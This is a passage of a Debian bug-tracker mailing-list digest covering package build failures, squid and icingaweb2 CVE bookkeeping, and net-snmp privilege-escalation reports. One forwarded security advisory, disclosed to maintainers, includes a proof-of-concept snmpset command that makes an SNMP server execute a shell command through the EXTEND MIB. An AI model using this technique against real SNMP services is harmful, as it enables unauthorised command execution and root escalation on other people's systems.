s390-tools_2.3.0-2~deb10u1.debian.tar.xz
 ed0aac88d4a7abd5ba52f6464ab788b4 6432 admin important 
s390-tools_2.3.0-2~deb10u1_source.buildinfo

-BEGIN PGP SIGNATURE-

iQFFBAEBCAAvFiEEPzuChCNsw7gPxr3/RG4lRTXQVuwFAl88tMARHHBrZXJuQGRl
Ymlhbi5vcmcACgkQRG4lRTXQVuwxbAgAuQBSw6k2c+ASRZDnxqFWMGcZvpZGa1Sa
UDYfvUKcfDIeouMuA0jPNPjd1Zvy0pp7fBn8kPY6nyCk3lL50UXg+W0Hibio47Gm
tgJ421oFim4iQOTpkgZPQVj/kd6GKBCJ9/GuiLF1k43Sxl7WbahNJyn/49ilSE52
iGA6JBoU0X/1m6m8O1vglK5wBNeeUyjjVxamnL4gpZ/IKDla+uJAWGfVufCPH/tW
uxgLGx91qaM7o8ZaLjNwgdsx2bq40k4N7PeoELiJxCrstPCoJ4omBFetNgfcnD7j
BXc7Xk4UmBJYYnSdbloOrAQBDbGkVUkXLUYIY+rjriktjc2lN2K4Hw==
=43F1
-END PGP SIGNATURE End Message ---


Bug#968694: marked as done (python-django-jsonfield: Missing build dependency on python3-psycopg2)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 19:19:05 +
with message-id 
and subject line Bug#968694: fixed in python-django-jsonfield 1.4.0-2
has caused the Debian Bug report #968694,
regarding python-django-jsonfield: Missing build dependency on python3-psycopg2
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
968694: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968694
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: python-django-jsonfield
Version: 1.4.0-1
Severity: serious
Tags: ftbfs

https://buildd.debian.org/status/fetch.php?pkg=python-django-jsonfield=all=1.4.0-1=1597330157=0

...
   debian/rules override_dh_auto_test
make[1]: Entering directory '/<>'
dh_auto_test -- --system=custom --test-args="{interpreter} debian/run_tests.py"
I: pybuild base:217: python3.8 debian/run_tests.py
E
==
ERROR: jsonfield.tests (unittest.loader._FailedTest)
--
ImportError: Failed to import test module: jsonfield.tests
Traceback (most recent call last):
  File "/usr/lib/python3.8/unittest/loader.py", line 470, in _find_test_path
package = self._get_module_from_name(name)
  File "/usr/lib/python3.8/unittest/loader.py", line 377, in 
_get_module_from_name
__import__(name)
  File "/<>/jsonfield/tests/__init__.py", line 1, in 
from .test_fields import *  # NOQA
  File "/<>/jsonfield/tests/test_fields.py", line 9, in 
from jsonfield.tests.jsonfield_test_app.models import *  # NOQA
  File "/<>/jsonfield/tests/jsonfield_test_app/models.py", line 1, 
in 
from django.contrib.postgres.fields import JSONField as PostgresJSONField
  File 
"/usr/lib/python3/dist-packages/django/contrib/postgres/fields/__init__.py", 
line 1, in 
from .array import *  # NOQA
  File 
"/usr/lib/python3/dist-packages/django/contrib/postgres/fields/array.py", line 
4, in 
from django.contrib.postgres.forms import SimpleArrayField
  File 
"/usr/lib/python3/dist-packages/django/contrib/postgres/forms/__init__.py", 
line 4, in 
from .ranges import *  # NOQA
  File 
"/usr/lib/python3/dist-packages/django/contrib/postgres/forms/ranges.py", line 
3, in 
from psycopg2.extras import DateRange, DateTimeTZRange, NumericRange
ModuleNotFoundError: No module named 'psycopg2'


--
Ran 1 test in 0.000s

FAILED (errors=1)
System check identified no issues (0 silenced).
E: pybuild pybuild:352: test: plugin custom failed with: exit code=1: python3.8 
debian/run_tests.py
dh_auto_test: error: pybuild --test -i python{version} -p 3.8 --system=custom 
"--test-args={interpreter} debian/run_tests.py" returned exit code 13
make[1]: *** [debian/rules:10: override_dh_auto_test] Error 25
--- End Message ---
--- Begin Message ---
Source: python-django-jsonfield
Source-Version: 1.4.0-2
Done: =?utf-8?q?Rapha=C3=ABl_Hertzog?= 

We believe that the bug you reported is fixed in the latest version of
python-django-jsonfield, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 968...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Raphaël Hertzog  (supplier of updated 
python-django-jsonfield package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Mon, 24 Aug 2020 21:04:23 +0200
Source: python-django-jsonfield
Architecture: source
Version: 1.4.0-2
Distribution: unstable
Urgency: medium
Maintainer: Debian Python Modules Team 

Changed-By: Raphaël Hertzog 
Closes: 968694
Changes:
 python-django-jsonfield (1.4.0-2) unstable; urgency=medium
 .
   * Add build-depends on python3-pyscopg2 for test suite (Closes: #968694)
   * Add salsa CI file
   * Configure autodep8 to use the correct import name for the generated test
Checksums-Sha1:
 2eeb5c90574ac92adf843cd43734c540d4cbc44b 1922 
python-django-jsonfield_1.4.0-2.dsc
 f0fa73319550162690a65d90edb1966e48f0fb4d 3580 
python-django-jsonfield_1.4.0-2.debian.tar.xz
 04ed0fc02bfdc7b667eba9f130f5d8787759c668 6578 
python-django-jsonfield_1.4.0-2_source.buildinfo
Checksums-Sha256:
 

Bug#964667: marked as done (node-chokidar: FTBFS: dh_auto_test: error: /bin/sh -ex debian/tests/pkg-js/test returned exit code 1)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 19:03:56 +
with message-id 
and subject line Bug#964667: fixed in node-chokidar 3.4.2-1
has caused the Debian Bug report #964667,
regarding node-chokidar: FTBFS: dh_auto_test: error: /bin/sh -ex 
debian/tests/pkg-js/test returned exit code 1
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
964667: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=964667
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Source: node-chokidar
Version: 3.4.0-1
Severity: serious
Justification: FTBFS on amd64
Tags: bullseye sid ftbfs
Usertags: ftbfs-20200709 ftbfs-bullseye

Hi,

During a rebuild of all packages in sid, your package failed to build
on amd64.

Relevant part (hopefully):
> make[1]: Entering directory '/<>'
> # No pkg-js-tools auto build
> make[1]: Leaving directory '/<>'
>dh_auto_test --buildsystem=nodejs
>   /bin/sh -ex debian/tests/pkg-js/test
> + mocha --exit --reporter spec --timeout 8000
> 
> 
>   chokidar
> ✓ should expose public API methods
> fs.watch (non-polling)
>   watch a directory
> ✓ should produce an instance of chokidar.FSWatcher
> ✓ should expose public API methods
> ✓ should emit `add` event when file was added (44ms)
> ✓ should emit nine `add` events when nine files were added in one 
> directory (1294ms)
> ✓ should emit thirtythree `add` events when thirtythree files were 
> added in nine directories (2857ms)
> ✓ should emit `addDir` event when directory was added
> ✓ should emit `change` event when file was changed
> ✓ should emit `unlink` event when file was removed (102ms)
> ✓ should emit `unlinkDir` event when a directory was removed (43ms)
> ✓ should emit two `unlinkDir` event when two nested directories were 
> removed (5025ms)
> ✓ should emit `unlink` and `add` events when a file is renamed (123ms)
> ✓ should emit `add`, not `change`, when previously deleted file is 
> re-added (165ms)
> ✓ should not emit `unlink` for previously moved files (404ms)
> ✓ should survive ENOENT for missing subdirectories
> ✓ should notice when a file appears in a new directory
> ✓ should watch removed and re-added directories (1544ms)
> ✓ should emit `unlinkDir` and `add` when dir is replaced by file 
> (84ms)
> ✓ should emit `unlink` and `addDir` when file is replaced by dir 
> (144ms)
>   watch individual files
> ✓ should detect changes
> ✓ should detect unlinks (121ms)
> ✓ should detect unlink and re-add (164ms)
> ✓ should ignore unwatched siblings (43ms)
> Skipping gh-682: should detect unlink
>   - should detect unlink while watching a non-existent second file in 
> another directory
>   - should detect unlink and re-add while watching a second file
>   - should detect unlink and re-add while watching a non-existent 
> second file in another directory
>   - should detect unlink and re-add while watching a non-existent 
> second file in the same directory
>   - should detect two unlinks and one re-add
>   - should detect unlink and re-add while watching a second file and 
> a non-existent third file
>   renamed directory
> ✓ should emit `add` for a file in a renamed directory (1024ms)
>   watch non-existent paths
> ✓ should watch non-existent file and detect add (42ms)
> ✓ should watch non-existent dir and detect addDir/add (63ms)
>   watch glob patterns
> ✓ should correctly watch and emit based on glob input (47ms)
> ✓ should respect negated glob patterns (122ms)
> ✓ should traverse subdirs to match globstar patterns (177ms)
> ✓ should resolve relative paths with glob patterns (45ms)
> ✓ should correctly handle conflicting glob patterns (131ms)
> ✓ should correctly handle intersecting glob patterns (44ms)
> ✓ should not confuse glob-like filenames with globs (63ms)
> ✓ should treat glob-like directory names as literal directory names 
> when globbing is disabled (45ms)
> ✓ should treat glob-like filenames as literal filenames when globbing 
> is disabled (42ms)
> ✓ should not prematurely filter dirs against complex globstar 
> patterns (67ms)
> ✓ should emit matching dir events (45ms)
> ✓ should correctly handle glob with braces
>   watch symlinks
> ✓ should watch symlinked dirs
> ✓ should watch symlinked files
> ✓ should follow 

Processed: retitle 968933 to squid: CVE-2020-24606: SQUID-2020:9 Denial of Service processing Cache Digest Response

2020-08-24 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

> retitle 968933 squid: CVE-2020-24606: SQUID-2020:9 Denial of Service 
> processing Cache Digest Response
Bug #968933 {Done: Luigi Gangitano } [src:squid] squid: 
SQUID-2020:9 Denial of Service processing Cache Digest Response
Changed Bug title to 'squid: CVE-2020-24606: SQUID-2020:9 Denial of Service 
processing Cache Digest Response' from 'squid: SQUID-2020:9 Denial of Service 
processing Cache Digest Response'.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
968933: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968933
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems



Processed: found 968932 in 4.6-1+deb10u3, found 968932 in 4.6-1, found 968933 in 4.6-1+deb10u3 ...

2020-08-24 Thread Debian Bug Tracking System
Processing commands for cont...@bugs.debian.org:

> found 968932 4.6-1+deb10u3
Bug #968932 {Done: Luigi Gangitano } [src:squid] squid: 
CVE-2020-15811: SQUID-2020:8 HTTP(S) Request Splitting
Marked as found in versions squid/4.6-1+deb10u3.
> found 968932 4.6-1
Bug #968932 {Done: Luigi Gangitano } [src:squid] squid: 
CVE-2020-15811: SQUID-2020:8 HTTP(S) Request Splitting
Marked as found in versions squid/4.6-1.
> found 968933 4.6-1+deb10u3
Bug #968933 {Done: Luigi Gangitano } [src:squid] squid: 
CVE-2020-24606: SQUID-2020:9 Denial of Service processing Cache Digest Response
Marked as found in versions squid/4.6-1+deb10u3.
> found 968933 4.6-1
Bug #968933 {Done: Luigi Gangitano } [src:squid] squid: 
CVE-2020-24606: SQUID-2020:9 Denial of Service processing Cache Digest Response
Marked as found in versions squid/4.6-1.
> found 968934 4.6-1+deb10u3
Bug #968934 {Done: Luigi Gangitano } [src:squid] squid: 
CVE-2020-15810: SQUID-2020:10 HTTP(S) Request Smuggling
Marked as found in versions squid/4.6-1+deb10u3.
> found 968934 4.6-1
Bug #968934 {Done: Luigi Gangitano } [src:squid] squid: 
CVE-2020-15810: SQUID-2020:10 HTTP(S) Request Smuggling
Marked as found in versions squid/4.6-1.
> thanks
Stopping processing here.

Please contact me if you need assistance.
-- 
968932: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968932
968933: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968933
968934: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968934
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems



Bug#968833: marked as done (CVE-2020-24368)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 18:02:08 +
with message-id 
and subject line Bug#968833: fixed in icingaweb2 2.6.2-3+deb10u1
has caused the Debian Bug report #968833,
regarding CVE-2020-24368
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
968833: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=968833
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: icingaweb2
Severity: grave
Tags: security
X-Debbugs-Cc: Debian Security Team 

This was assigned CVE-2020-24368:
https://icinga.com/2020/08/19/icinga-web-security-release-v2-6-4-v2-7-4-and-v2-8-2/
https://github.com/Icinga/icingaweb2/issues/4226

Cheers,
Moritz

--- End Message ---
--- Begin Message ---
Source: icingaweb2
Source-Version: 2.6.2-3+deb10u1
Done: Bas Couwenberg 

We believe that the bug you reported is fixed in the latest version of
icingaweb2, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 968...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bas Couwenberg  (supplier of updated icingaweb2 package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Sat, 22 Aug 2020 07:49:25 +0200
Source: icingaweb2
Binary: icingacli icingaweb2 icingaweb2-common icingaweb2-module-doc 
icingaweb2-module-monitoring php-icinga
Architecture: source all
Version: 2.6.2-3+deb10u1
Distribution: buster-security
Urgency: high
Maintainer: Debian Nagios Maintainer Group 

Changed-By: Bas Couwenberg 
Description:
 icingacli  - simple CLI tool for Icingaweb2 and its modules
 icingaweb2 - simple and responsive web interface for Icinga
 icingaweb2-common - simple and responsive web interface for Icinga - common 
files
 icingaweb2-module-doc - simple and responsive web interface for Icinga - 
documentation mo
 icingaweb2-module-monitoring - simple and responsive web interface for Icinga 
- monitoring modul
 php-icinga - PHP library to communicate with and use Icinga
Closes: 968833
Changes:
 icingaweb2 (2.6.2-3+deb10u1) buster-security; urgency=high
 .
   * Team upload.
   * Update branch in gbp.conf & Vcs-Git URL.
   * Add upstream patch to fix CVE-2020-24368.
 (closes: #968833)
Checksums-Sha1:
 90be5d13907cdc8f3191b8e23b77ea88d081c17d 2399 icingaweb2_2.6.2-3+deb10u1.dsc
 03c1d94bf41f7b448c8ce1187fb4127331605772 8171965 icingaweb2_2.6.2.orig.tar.gz
 66e704d72d6e001ae19fa7a5a1f14f2d605b 17284 
icingaweb2_2.6.2-3+deb10u1.debian.tar.xz
 c2c3e9a596c7742f24f8396a5b81196f713158a1 29504 
icingacli_2.6.2-3+deb10u1_all.deb
 df48675f8c97ea16db2186cbfc50601b9db86ea1 364088 
icingaweb2-common_2.6.2-3+deb10u1_all.deb
 096980ad0101f603783f02a7d178539fbad5568d 45088 
icingaweb2-module-doc_2.6.2-3+deb10u1_all.deb
 22f7b9d1368199a65a32db9043b0a92808bd7334 684464 
icingaweb2-module-monitoring_2.6.2-3+deb10u1_all.deb
 f452b0205389d13fd80501696354357fb71ace4f 1769584 
icingaweb2_2.6.2-3+deb10u1_all.deb
 c3102b6d40c9b0c03acd3cebdef62e67a532fdc6 9671 
icingaweb2_2.6.2-3+deb10u1_amd64.buildinfo
 46ca5e62295430cff93070529da8ac3be1eea973 750412 
php-icinga_2.6.2-3+deb10u1_all.deb
Checksums-Sha256:
 548d636531d4283659862ec44ec683f85bb4b55c60566759f9706337938e43c2 2399 
icingaweb2_2.6.2-3+deb10u1.dsc
 49c713451e0c2c1c721c38edbb106c28ddb547ac1347b4aa94217a09c88dc92b 8171965 
icingaweb2_2.6.2.orig.tar.gz
 14575df8330ce2b0e4a239b99389d419fe853c483e68ed0de374cdc70a9af27b 17284 
icingaweb2_2.6.2-3+deb10u1.debian.tar.xz
 cd74535dd69cf1f7f1d52dc09cbd820903198b2f24f40824cb228b42f49973aa 29504 
icingacli_2.6.2-3+deb10u1_all.deb
 daf2a53ec673f6eac3ebf3ccaf5953cffcb986668b557d28c90ad73b43b2dd2b 364088 
icingaweb2-common_2.6.2-3+deb10u1_all.deb
 506a00a9c1a7636e81e3863ebbb5c251ada73268115b975cde393c53d0513c87 45088 
icingaweb2-module-doc_2.6.2-3+deb10u1_all.deb
 524fb625c2a8adaf56aaad89d9a8042de9041052529519166e092f6ec9d4aed0 684464 
icingaweb2-module-monitoring_2.6.2-3+deb10u1_all.deb
 c81e1f45301daeb3691ded3b21824b6688291cdc0eadb4e1b65cde40900f7ca1 1769584 
icingaweb2_2.6.2-3+deb10u1_all.deb
 bcdd229ed79d85305f8252392e2ff1e767a2764f7df7dff780132a163605b968 9671 
icingaweb2_2.6.2-3+deb10u1_amd64.buildinfo
 

Bug#966599: marked as done (snmpd: Elevation of Privileges due to symlink handling (CVE-2020-15861))

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 18:02:10 +
with message-id 
and subject line Bug#966599: fixed in net-snmp 5.7.3+dfsg-5+deb10u1
has caused the Debian Bug report #966599,
regarding snmpd: Elevation of Privileges due to symlink handling 
(CVE-2020-15861)
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
966599: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=966599
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: snmpd
Version: 5.8+dfsg-4
Severity: grave
Tags: security upstream
Justification: user security hole

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

CVE-2020-15861

snmpd runs as a low privileged user account. However, in combination with
the *snmp-mibs-downloader package* this protection can be bypassed and it is
possible for this account to elevate permissions to the root user.

This attack happens due to how snmpd handles symlinks.

References:
 https://github.com/net-snmp/net-snmp/issues/145
 
https://github.com/net-snmp/net-snmp/commit/4fd9a450444a434a993bc72f7c3486ccce41f602

This security vulnerability was found by Tobias Neitzel of usd AG.


- -- System Information:
Debian Release: bullseye/sid
  APT prefers unstable
  APT policy: (500, 'unstable'), (1, 'experimental')
Architecture: amd64 (x86_64)
Foreign Architectures: i386

Kernel: Linux 5.4.0-4-amd64 (SMP w/8 CPU cores)
Kernel taint flags: TAINT_WARN
Locale: LANG=en_AU.UTF-8, LC_CTYPE=en_AU.UTF-8 (charmap=UTF-8), 
LANGUAGE=en_AU:en (charmap=UTF-8)
Shell: /bin/sh linked to /usr/bin/dash
Init: systemd (via /run/systemd/system)
LSM: AppArmor: enabled

Versions of packages snmpd depends on:
ii  adduser3.118
ii  debconf [debconf-2.0]  1.5.73
ii  init-system-helpers1.57
ii  libc6  2.30-2
ii  libsnmp-base   5.8+dfsg-2
ii  libsnmp35  5.8+dfsg-4
ii  lsb-base   11.1.0

snmpd recommends no packages.

Versions of packages snmpd suggests:
ii  snmptrapd  5.8+dfsg-4

- -- Configuration Files:
/etc/snmp/snmpd.conf changed [not included]

- -- debconf information excluded

-BEGIN PGP SIGNATURE-

iQJGBAEBCgAwFiEEXT3w9TizJ8CqeneiAiFmwP88hOMFAl8j268SHGNzbWFsbEBk
ZWJpYW4ub3JnAAoJEAIhZsD/PITjzj0P/ReencZCeEbL/F2lznh8AhH42fC6tpi9
1McAS/calfYn9wFUTIfqi9JemMVjx8+2m0c6qW0/Yz698CACS45eUY4xTK9ejLEM
Lezi2kQDLZwGHLfMIcd4U3DSC3ZNlFomOT0Idl43q2yiqHLYdXzxWaVSfgAHxLB2
ElBHSAS+UYCgp7Jd38oEZ5++rTUw5dKb249IiUee+AMCUToCHMes0abJ4r7D79ow
PCIV410f1m1WlPJa5nWD/MioSnjdR2v9gmkuzmTq5Qjl6ShOR2B7Fh2/NWXzegXh
Tu7MPeSAa7VnybicwIACzo7M7YvVBsw32CTtJZnOKFFU/Xrg6j/cUvTkpKuB+c+W
D3dTgjieMRC0Gfc6aIAGE+nTOP4xMjLGGyhAxgBKp2THlZksO5ZSA4KXGswGLygl
N19qe30Xy0ROuAKPMChNRmJXw0M+/pY2AX91QJUqGhvkXPfNBmtiy6LHyFo2RRCk
yOlAC/8oQH8uHp1x7SUe02tiogbsLY/Yn6HTuvlo89Bt7UK2ifQXyqUkapySF3nw
QDRFDh8+hkCvAubcW2ViEAY2n0Mca0+zeN5FyxK3PINSU6iz1zT2L3NI2HhIrZuZ
3YXCDQJe2jYa/LpeeBaR3TdY6ArDiwrkpzTwsOfltc4BzMyzUt1/7ccnhhNZo9N1
xwiQIxBbfw7b
=Rnwp
-END PGP SIGNATURE-
--- End Message ---
--- Begin Message ---
Source: net-snmp
Source-Version: 5.7.3+dfsg-5+deb10u1
Done: Craig Small 

We believe that the bug you reported is fixed in the latest version of
net-snmp, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 966...@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Craig Small  (supplier of updated net-snmp package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmas...@ftp-master.debian.org)


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA512

Format: 1.8
Date: Fri, 31 Jul 2020 20:53:22 +1000
Source: net-snmp
Binary: libsnmp-base libsnmp-dev libsnmp-perl libsnmp-perl-dbgsym libsnmp30 
libsnmp30-dbg python-netsnmp python-netsnmp-dbgsym snmp snmp-dbgsym snmpd 
snmpd-dbgsym snmptrapd snmptrapd-dbgsym tkmib
Architecture: source all amd64
Version: 5.7.3+dfsg-5+deb10u1
Distribution: buster-security
Urgency: high
Maintainer: Net-SNMP Packaging Team 
Changed-By: Craig Small 
Description:
 libsnmp-base - SNMP configuration script, MIBs and documentation
 libsnmp-dev - SNMP (Simple Network Management Protocol) development files
 libsnmp-perl - SNMP (Simple Network Management Protocol) Perl5 support
 libsnmp30  - SNMP (Simple Network Management Protocol) library
 libsnmp30-dbg - SNMP (Simple Network Management Protocol) library 

Bug#965166: marked as done (snmpd privilege escalation)

2020-08-24 Thread Debian Bug Tracking System
Your message dated Mon, 24 Aug 2020 18:02:10 +
with message-id 
and subject line Bug#965166: fixed in net-snmp 5.7.3+dfsg-5+deb10u1
has caused the Debian Bug report #965166,
regarding snmpd privilege escalation
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact ow...@bugs.debian.org
immediately.)


-- 
965166: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=965166
Debian Bug Tracking System
Contact ow...@bugs.debian.org with problems
--- Begin Message ---
Package: snmpd
Version: 5.7.3

The report below comes from USD AG (https://www.usd.de). I am forwarding
this report to the Debian organization because I think the root cause is
not in the upstream Net-SNMP project but instead in how the Debian
project packaged the Net-SNMP software. I see two possible approaches to
fix this next to the solutions already mentioned in the report below:
- Disable the EXTEND MIB. This will be considered as a regression by the
  users of this MIB.
- Do not allow the Debian-snmp user to modify the snmpd configuration.

-
Advisory: Elevation of Privileges in Net-SNMP

Description
===
On Debian based systems, the *NET-SNMP* daemon runs as a low privileged
user account. However, this protection can be bypassed and it is
possible for this account to elevate permissions to the root user.

Details
===
Advisory ID: usd20200059
OTRS ID: Ticket#202007070115
Product: NET-SNMP
Affected Version: 5.7.3 (probably earlier versions are also affected)
Vulnerability Type: Elevation of Privileges
Security Risk: High
Vendor URL: http://www.net-snmp.org/
Vendor Status: Not fixed
Advisory Status: Open
CVE number: Not requested yet
CVE Link: Not requested yet
First Published: -MM-DD
Last Update: 2020-07-09

Introduction

The Simple Network Management Protocol (SNMP) is a widely used network
protocol for controlling and monitoring network devices.
Since the corresponding service (SNMP daemon) needs access to a lot of
system components and (per default) binds the network port 161, it
usually runs as the root user.

On Debian based systems, the default installation of SNMP sets up a
dedicated low privileged user account (*Debian-snmp*), that is used to
run the SNMP daemon. This adds an additional layer of security, as a
compromise of the SNMP service does not directly allow root
access to the targeted device.


Proof of Concept

After installing the SNMP daemon on a Debian based system (e.g. ``apt
install snmpd``), a new user account(*Debian-snmp*) is created by the
installer:

```
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
[..SNIP..]
Debian-snmp:x:122:127::/var/lib/snmp:/bin/false
```

The configuration of the snmpd daemon (systemd) shows, that this is the
user account that runs the service:

```
ubuntu@ubuntu:~$ cat /lib/systemd/system/snmpd.service
[Unit]
Description=Simple Network Management Protocol (SNMP) Daemon.
After=network.target
ConditionPathExists=/etc/snmp/snmpd.conf

[Service]
Environment="MIBSDIR=/usr/share/snmp/mibs:/usr/share/snmp/mibs/iana:/usr/share/snmp/mibs/ietf:/usr/share/mibs/site:/usr/share/snmp/mibs:/usr/share/mibs/iana:/usr/share/mibs/ietf:/usr/share/mibs/netsnmp"
Environment="MIBS="
Type=simple
ExecStartPre=/bin/mkdir -p /var/run/agentx
ExecStart=/usr/sbin/snmpd -Lsd -Lf /dev/null -u Debian-snmp -g
Debian-snmp -I -smux,mteTrigger,mteTriggerConf -f
ExecReload=/bin/kill -HUP $MAINPID

[Install]
WantedBy=multi-user.target
```

In the following it is assumed that an attacker has *read-write* access
to the SNMP service and is able to use the *NET-SNMP-EXTEND-MIB* extension.
The following snipped shows how an attacker can abuse the *read-write*
access to execute the operating system command ``id`` on the remote SNMP
server:

```
ubuntu@ubuntu:~$ cat setup.sh
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c secret localhost \
'nsExtendStatus."example"'  = createAndGo \
'nsExtendCommand."example"' = /bin/bash \
'nsExtendArgs."example"'= '-c id'
ubuntu@ubuntu:~$ bash setup.sh
NET-SNMP-EXTEND-MIB::nsExtendStatus."example" = INTEGER: createAndGo(4)
NET-SNMP-EXTEND-MIB::nsExtendCommand."example" = STRING: /bin/bash
NET-SNMP-EXTEND-MIB::nsExtendArgs."example" = STRING: -c id
ubuntu@ubuntu:~$ snmpwalk -v2c -c secret localhost
NET-SNMP-EXTEND-MIB::nsExtendObjects | grep example
NET-SNMP-EXTEND-MIB::nsExtendCommand."example" = STRING: /bin/bash
NET-SNMP-EXTEND-MIB::nsExtendArgs."example" = STRING: -c id
NET-SNMP-EXTEND-MIB::nsExtendInput."example" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendCacheTime."example" = INTEGER: 5

Bug#968965: xen: FTBFS in sid

2020-08-24 Thread Gianfranco Costamagna
Source: xen
Version: 4.11.4+24-gddaaccbbab-1
Severity: serious

Hello, looks like xen is FTBFS because of some bd-uninstallable python package 
and a gcc-10 related build failure. 




gcc  -m64 -DBUILD_ID -fno-strict-aliasing -std=gnu99 -Wall -Wstrict-prototypes 
-Wdeclaration-after-statement -Wno-unused-but-set-variable 
-Wno-unused-local-typedefs   -O2 -fomit-frame-pointer 
-D__XEN_INTERFACE_VERSION__=__XEN_LATEST_INTERFACE_VERSION__ -MMD -MF .tdb.o.d 
-D_LARGEFILE_SOURCE -D_LARGEFILE64_SOURCE  -g -O2 
-fdebug-prefix-map=/build/xen-4.11.4+24-gddaaccbbab=. -fstack-protector-strong 
-Wformat -Werror=format-security -Wdate-time -D_FORTIFY_SOURCE=2 -Werror -I. 
-include /build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/config.h 
-I./include 
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/libs/evtchn/include
 -I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/include 
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/libxc/include 
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/libs/toollog/include
 -I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/include 
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/libs/foreignmemory/include
 -I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/include 
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/libs/devicemodel/include
 -I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/include 
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/include 
-D__XEN_TOOLS__ 
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/libs/toolcore/include
 -I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/include 
-DXEN_LIB_STORED="\"/var/lib/xenstored\"" 
-DXEN_RUN_STORED="\"/var/run/xenstored\""  
-I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/libs/gnttab/include
 -I/build/xen-4.11.4+24-gddaaccbbab/tools/xenstore/../../tools/include  -c -o 
tdb.o tdb.c 
gcc  -m64 -DBUILD_ID -fno-strict-aliasing -std=gnu99 -Wall -Wstrict-prototypes 
-Wdeclaration-after-statement -Wno-unused-but-set-variable 
-Wno-unused-local-typedefs   -O2 -fomit-frame-pointer 
-D__XEN_INTERFACE_VERSION__=__XEN_LATEST_INTERFACE_VERSION__ -MMD -MF 
.talloc.o.d -D_LARGEFILE_SOURCE -D_LARGEFILE64_SOURCE  -g -O2 
